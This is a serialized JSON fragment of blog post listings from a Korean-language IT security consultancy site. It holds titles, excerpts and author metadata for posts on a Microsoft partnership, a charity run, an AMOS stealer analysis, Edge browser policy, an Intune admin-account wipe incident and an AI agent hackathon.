업무 환경에서 클라우드 플랫폼과 보안을 거쳐 AI 애플리케이션 자체에 이르기까지 Microsoft 스택 전반에서 AI 프로젝트를 지속 가능하게 제공하며, 이러한 역량을 실제 현장에서 입증한 파트너입니다. DACH 지역에서 이 그룹에 속하는 기업은 손에 꼽을 정도이며, 우리는 그중 하나입니다.","/posts/2026-06-26-frontier-partner","posts/2026-06-26-frontier-partner",[13469,13551,13496],"Microsoft Partner",{"id":13553,"title":13554,"author":13555,"cta":494,"description":13556,"hideInRecent":484,"layout":12927,"meta":13557,"moment":13558,"path":13562,"stem":13563,"tags":13564,"webcast":484},"content_ko/posts/2026-06-09-vair-run.md","좋은 뜻을 위한 160킬로미터",[13345],"일요일 아침 8시 30분, 마인강 변 Holbeinsteg. 통일된 NinjaCat 셔츠를 입은 열한 명의 동료가 Frankfurter Runden을 준비하고 있습니다. 비, 번개, 천둥까지 함께였습니다. 좋은 뜻을 위해 달린다는 것은, 궂은 날씨에도 러닝화 끈을 조여 매기에 충분한 동기였습니다.",{"lang":12929,"date":13558,"categories":13559,"blogtitlepic":13560,"customExcerpt":13561},"2026-06-08",[13463],"frankfurter-runden.png","열한 명의 동료, 16바퀴, 160킬로미터, 뇌우 한 차례 그리고 시상대 입상: glueckkanja는 Frankfurter Runden 2026에 참가했고, 달린 한 바퀴마다 Offenbach에 포용적인 스포츠·문화 공원을 짓고 있는 VAIR e.V.에 기부했습니다.","/posts/2026-06-09-vair-run","posts/2026-06-09-vair-run",[13565,13535,13566],"Top Arbeitgeber","Soziales Engagement",{"id":13568,"title":13569,"author":13570,"cta":494,"description":13571,"hideInRecent":484,"layout":12927,"meta":13572,"moment":13573,"path":13577,"stem":13578,"tags":13579,"webcast":484},"content_ko/posts/2026-04-10-incident-to-intelligence.md","알려지지 않은 AMOS 스틸러의 해부: 알림에서 몇 시간 만에 면역까지",[523],"우리 SOC에서 알림이 발생하면 시계가 돌아가기 시작합니다. 해당 고객뿐 아니라 우리 보호 아래에 있는 모든 조직에 대해서 말입니다. 현대 위협 환경에서 가장 위험한 순간은 인텔리전스 갭(Intelligence Gap), 즉 새로운 멀웨어 변종이 처음 사용된 시점과 업계가 그것을 알게 되는 날 사이의 시간 창입니다.",{"lang":12929,"date":13573,"categories":13574,"blogtitlepic":13575,"customExcerpt":13576},"2026-04-10",[12934],"head-amos-stealer.png","지금까지 문서화되지 않은 AMOS 스틸러 변종이 macOS 엔드포인트를 침해했습니다. 알려진 해시도, 공개 데이터베이스의 C2 데이터도 없었습니다. 우리 SOC는 여섯 겹의 난독화 계층을 해체하고 모든 지표를 추출한 뒤, 업계가 이 샘플을 미처 보기도 전에 몇 시간 만에 모든 SOC 고객에게 보호를 배포했습니다.","/posts/2026-04-10-incident-to-intelligence","posts/2026-04-10-incident-to-intelligence",[13050,13580,13581,13582,13051],"Incident Response","macOS Security","Malware Analysis",{"id":13584,"title":13585,"author":13586,"cta":494,"description":13587,"hideInRecent":484,"layout":12927,"meta":13588,"moment":13589,"path":13592,"stem":13593,"tags":494,"webcast":484},"content_ko/posts/2026-03-21-microsoft-edge-corporate-browser.md","Edge가 유일한 Corporate Browser여야 하는 이유",[13117],"기업 환경에서 브라우저의 선택은 전략적 결정입니다. 이는 실제로 얼마나 많은 보안과 관리 부담을 갖게 되는지에 직접적인 영향을 미칩니다. Google Chrome은 오랫동안 당연한 선택지였지만, Microsoft Edge는 특히 Microsoft 365가 사용되고 관리가 Intune을 통해 이루어지는 경우 기존 스택에 직접 연결되는 브라우저로 발전했습니다.",{"lang":12929,"date":13589,"blogtitlepic":13590,"customExcerpt":13591},"2026-03-21","head-microsoft-edge-default-browser.jpg","Chrome를 진정으로 선택한 기업은 없습니다. 그저 그 자리에 있었을 뿐이며, 자체 동기화 로직과 자체 계정 관리, 자체 정책 인터페이스를 가지고 있었습니다. 반면 Microsoft Edge는 이미 가동 중인 인프라, 즉 Entra ID, Intune, Defender에 직접 연결됩니다. 이 글에서는 전환이 어떤 모습인지, Chrome을 Intune 정책으로 어떻게 랜딩 페이지로 리디렉션하는지, 그리고 두 개의 브라우저를 병행 운영하는 것을 멈추면 무엇이 사라지는지를 보여드립니다.","/posts/2026-03-21-microsoft-edge-corporate-browser","posts/2026-03-21-microsoft-edge-corporate-browser",{"id":13595,"title":13596,"author":13597,"cta":494,"description":13598,"hideInRecent":484,"layout":12927,"meta":13599,"moment":13600,"path":13604,"stem":13605,"tags":13606,"webcast":484},"content_ko/posts/2026-03-20-stryker-attack-intune-privilege.md","관리자 계정 하나면 충분했습니다.",[13221],"2026년 3월 11일 수요일. 79개국의 Stryker 사무실 직원들은 컴퓨터를 켰고, 화면이 비어 있는 것을 발견했습니다. 로그인 화면은 하나의 로고로 대체되어 있었습니다. 회사 노트북, 업무용 휴대폰, 그리고 회사의 BYOD 프로그램에 등록된 개인 기기까지 모두 동시에, 하룻밤 사이에 초기화되었습니다. 랜섬웨어도, 멀웨어 시그니처도, 엔드포인트 탐지 도구가 잡아낼 수 있었던 그 어떤 것도 없었습니다.",{"lang":12929,"date":13600,"categories":13601,"blogtitlepic":13602,"customExcerpt":13603},"2026-03-20",[12934],"head-stryker.jpg","2026년 3월 11일, Handala는 79개국의 기기를 초기화했고, 그 모든 것에 필요했던 것은 침해된 Intune 관리자 계정 하나였습니다. 멀웨어도, 익스플로잇도 없었고, 오직 정당한 관리 도구가 그 소유자를 겨냥했을 뿐입니다. 무슨 일이 있었는지, 왜 그것이 통했는지, 그리고 어떤 두 가지 아키텍처 허점을 막아야 하는지 살펴봅니다.","/posts/2026-03-20-stryker-attack-intune-privilege","posts/2026-03-20-stryker-attack-intune-privilege",[71,13452,13453],{"id":13608,"title":13609,"author":13610,"cta":494,"description":13611,"hideInRecent":484,"layout":12927,"meta":13612,"moment":13613,"path":13617,"stem":13618,"tags":13619,"webcast":484},"content_ko/posts/2026-03-16-ai-agent-hackathon.md","여섯 개의 Agent. 4주. 실제 운영.",[13248],"여러분의 IT 부서는 Agent가 몇 분이면 처리할 수 있는 작업에 매주 몇 시간을 쓰고 있습니까?",{"lang":12929,"date":13613,"categories":13614,"blogtitlepic":13615,"customExcerpt":13616},"2026-03-16",[13463],"head-ai-agent-hackathon.jpg","여섯 개 기업, 4주간의 구축 단계, 여섯 개의 실제로 작동하는 AI Agent. 이것이 첫 번째 glueckkanja AI Agent 해커톤이었습니다. Kiekert, Dr. Oetker, Eckes-Granini, igefa 그리고 lila logistik은 Copilot Studio에서 오늘날 실제로 운영되는 Agent를 구축했습니다. 그 과정에서 무엇이 만들어졌고 이 포맷이 어떻게 작동하는지 소개합니다.","/posts/2026-03-16-ai-agent-hackathon","posts/2026-03-16-ai-agent-hackathon",[13496,13620,13621,13622],"Copilot Studio","Hackathon","AI Agents",{"Karsten Kleinschmidt":13624,"Fritz Zurhorst":13625,"Nadine Klein":13626,"Jan Geisbauer":13627,"Carolin Kanja":13631,"Anna Ulbricht":13632,"Annette Brauns":13633,"Pascal Asch":13634,"Steffen Schwerdtfeger":13635},{"display_name":13086,"avatar":13087,"permalink":13088,"twitter":13089,"linkedin":13090,"imageOffsetTop":13091,"imageOffsetLeft":13092},{"display_name":13060,"avatar":13061,"permalink":13062,"linkedin":13063,"imageOffsetTop":13064},{"display_name":13080,"avatar":13081,"permalink":13082,"twitter":13083,"linkedin":13084,"imageOffsetTop":13064},{"display_name":13221,"avatar":13222,"permalink":13223,"twitter":13224,"linkedin":13224,"imageOffsetTop":13064,"socials":13628},[13629,13630],{"text":13227,"href":13228},{"text":13230,"href":13231},{"display_name":13248,"avatar":13249,"permalink":13250,"twitter":13251,"linkedin":13252},{"display_name":13338,"avatar":13339,"permalink":13340,"linkedin":13341,"imageOffsetTop":13342,"imageOffsetLeft":13343},{"display_name":13345,"avatar":13346,"permalink":13347,"linkedin":13348,"imageOffsetTop":13349,"imageOffsetLeft":13091},{"display_name":523,"avatar":13327,"permalink":13328,"linkedin":13329,"imageOffsetTop":13164},{"display_name":13117,"avatar":13118,"permalink":13119,"linkedin":13120,"twitter":13121,"imageOffsetTop":13122,"imageOffsetLeft":13123},{"id":13055,"extension":13056,"meta":13637,"stem":8,"__hash__":13407},{"Pascal Asch":13638},{"display_name":523,"avatar":13327,"permalink":13328,"linkedin":13329,"imageOffsetTop":13164},1791383939344]